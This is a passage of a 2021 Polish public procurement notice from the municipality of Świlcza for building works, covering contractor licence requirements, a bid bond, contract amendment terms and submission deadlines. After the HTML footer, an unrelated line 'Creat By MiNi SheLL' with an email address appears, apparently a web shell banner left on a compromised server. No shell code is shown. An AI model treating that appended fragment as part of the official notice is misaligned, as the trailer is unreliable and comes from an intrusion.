ważne uprawnienia wydane na podstawie obowiązujących<br/>wcześniej przepisów). W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje<br/>równoważne do wymaganych zdobyte w innych państwach, uznane w myśl art. 12a ustawy z<br/>dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2020 r. poz. 1333);<br/>2) 1 osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie tj. do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez<br/>ograniczeń (lub odpowiadające im ważne uprawnienia wydane na podstawie obowiązujących<br/>wcześniej przepisów). W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje<br/>równoważne do wymaganych zdobyte w innych państwach, uznane w myśl art. 12a ustawy z<br/>dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2020 r. poz. 1333);<br/>3) 1 osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie tj. do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń elektrycznych i elektroenergetycznych bez ogranczeń (lub odpowiadające im ważne<br/>uprawnienia wydane na podstawie obowiązujących wcześniej przepisów). W przypadku<br/>wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do wymaganych zdobyte w<br/>innych państwach, uznane w myśl art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj.<br/>Dz. U. z 2020 r. poz. 1333).<br/>W/w osoby fizyczne muszą posiadać uprawnienia do wykonywania samodzielnych funkcji<br/>technicznych w budownictwie zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.<br/>U. z 2020 r., poz. 1333) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28<br/>kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2020<br/>r., poz. 1333) lub odpowiadające im ważne uprawnienia wydane na podstawie obowiązujących<br/>wcześniej przepisów. W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje<br/>równoważne do wymaganych zdobyte w innych państwach, uznane w myśl art. 12a ustawy z<br/>dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2020 r. poz. 1333).<br/>Wykonawcy wspólnie ubiegający się o zamówienie muszą wykazać, że warunek udziału w<br/>postępowaniu jak wyżej – spełnia jeden z wykonawców samodzielnie lub łącznie (kumulatywnie)<br/>wszyscy/ kilku wykonawców wchodzących w skład grupy wykonawców wspólnie ubiegających<br/>się o zamówienie.<br/>W odniesieniu do warunków dotyczących doświadczenia wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w<br/>postępowaniu dotyczących zdolności technicznej lub zawodowej, zamawiający żąda następujących<br/>podmiotowych środków dowodowych:<br/>1) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami;<br/>3) w odniesieniu do warunków dotyczących doświadczenia (rozdz. IX SWZ) wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy<br/>wykonają usługi, do realizacji których te zdolności są wymagane. W przypadku, o którym mowa w<br/>zdaniu poprzedzającym, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika które roboty wykonają poszczególni wykonawcy.<br/>2. Wykaz podmiotowych środków dowodowych wymaganych przez zamawiającego od wykonawcy,<br/>który polega na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby na<br/>zasadach określonych w art. 118 ustawy:<br/>Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów<br/>na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Określono w SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium. Wykonawca jest zobowiązany do wniesienia<br/>wadium<br/>w wysokości: 2 000,00 zł (słownie: dwa tysiące złotych);<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto Banku Spółdzielczego w<br/>Głogowie Młp. Oddział w Świlczy nr rachunku 92 9159 1023 2005 5000 0026 0074 z dopiskiem:<br/>„Wadium - nr postępowania RGI.271.19.2021”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania<br/>rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji<br/>lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w ustawie p.z.p.<br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty<br/>wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania<br/>ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego<br/>postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Gmina Świlcza.<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58<br/>p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj.<br/>zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub<br/>nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o<br/>zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu i nie podleganiu wykluczeniu z postępowania<br/>składa oddzielnie każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy.<br/>4. Oświadczenie potwierdzające spełnianie warunków udziału w postępowaniu i nie podleganie<br/>wykluczeniu z postępowania składa oddzielnie każdy z wykonawców wspólnie ubiegających się<br/>o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane jedynie w formie<br/>pisemnej w postaci aneksu do umowy podpisanego przez obydwie strony, pod rygorem<br/>nieważności.2. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem art. 455p.z.p. oraz<br/>art. 3 umowy.3. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w<br/>stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku<br/>wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, w zakresie:1)zmiany<br/>terminu realizacji przedmiotu umowy spowodowane:a) warunkami atmosferycznymi<br/>uniemożliwiającymi prowadzenie robót budowlanych, przeprowadzanie prób i<br/>sprawdzeń,dokonywanie odbiorów lub inne czynniki zewnętrzne i niemożliwe doprze widzenia<br/>wydarzenia które będą miały wpływ na termin realizacji umowy; b) zmianami będącymi<br/>następstwem działania organów administracji, w szczególności:– przekroczeniem zakreślonych<br/>przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń,uzgodnień itp.,–<br/>odmową wydania przez organy administracji wymaganych decyzji, zezwoleń,–zmianą przepisów<br/>powodujących uzyskanie dokumentów, które te przepisy narzucają lub powodujących<br/>konieczność innych rozwiązań niż zakładano w opisie przedmiotu zamówienia; c)natrafieniem<br/>przez Wykonawcę na urządzenia podziemne uprzednio niezinwentaryzowane lub<br/>niewypały.niewybuchy. wykopalisk i archeologiczne;d) klęskami żywiołowymi;e) odmiennymi od<br/>przyjętych w dokumentacji technicznej warunkami geologicznymi(kategorie gruntu,<br/>kurzawka,głazy narzutowe itp.) skutkującymi niemożliwością zrealizowania przedmiotu umowy<br/>przy dotychczasowych założeniach technologicznych;f) odmiennymi od przyjętych w dokumentacji technicznej warunkami terenowymi, w szczególności istnieniem podziemnych sieci<br/>instalacji,urządzeń, nie zinwentaryzowanych obiektów budowlanych(fundamenty. ściany<br/>szczelne itp.)skutkującymi niemożliwością zrealizowania przedmiotu umowy przy<br/>dotychczasowych założeniach technologicznych lub materiałowych;g) odmiennym, od przyjętych<br/>w dokumentacji technicznej, stanem istniejącym remontowanej / przebudowywanej konstrukcji -<br/>możliwym do stwierdzeń a dopiero po odkopaniu / odsłonięciu, a skutkującym korektami w<br/>projekcie.2) zmian osobowych;3) materiałów. parametrów technicznych. technologii wykonania<br/>robót budowlanych,sposobu i zakresu wykonania przedmiotu umowy;4) pozostałych<br/>zmian:a)zmiana obowiązującej stawki VAT; dopuszcza się możliwość sporządzenia aneksu do<br/>umowy uwzględniającego zmianę wartości wynagrodzenia umowy z tego tytułu;b) ....5)realizacji<br/>dodatkowych robót budowlanych nieobjętych zamówieniem podstawowym, o ile stały się<br/>niezbędne do jego wykonania ...Informacje dotyczące zakresu i rodzaju zmian umowy oraz<br/>warunki ichwprowadzenia zostały określone w §21 projektu umowy stanowiącego załącznik nr<br/>4do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz ze wszystkimi wymaganymi oświadczeniami idokumentami należy złożyć za pośrednictwem platformy pod adresem:https://platformazakupowa.pl/pn/gmina_swilcza</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-05 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Do sekcji III.3.6.2) ogłoszenia: Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie<br/>dokumentów lub oświadczeń składane są przez Wykonawcę za pomocą poczty elektronicznej,<br/>na wskazany w pkt 2.2 adres e-mail. Sposób sporządzenia dokumentów elektronicznych musi<br/>być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia<br/>30grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie(Dz. U. z 2020poz. 2452) oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415);1. Zamawiający zawiera umowę w<br/>sprawie zamówienia publicznego w terminie nie krótszym niż 5 dni od dnia przesłania<br/>zawiadomienia o wyborze najkorzystniejszej oferty.2. Zamawiający może zawrzeć umowę w<br/>sprawie zamówienia publicznego przed upływem terminu, o którym mowa w ust. 1,jeżeli w<br/>postępowaniu o udzielenie zamówienia prowadzonym w trybie podstawowym złożono tylko<br/>jedną ofertę.3. Wykonawca, którego oferta zostanie uznana za najkorzystniejszą,będzie<br/>zobowiązany przed podpisaniem umowy do wniesienia zabezpieczenia należytego wykonania<br/>umowy (jeżeli jego wniesienie było wymagane) w wysokości i formie określonej w Rozdziale XX<br/>SWZ.4. W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia Zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w<br/>sprawie zamówienia publicznego umowy regulującej współpracę tych<br/>Wykonawców.5.Wykonawca będzie zobowiązany do podpisania umowy w miejscu i terminie<br/>wskazanym przez Zamawiającego</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com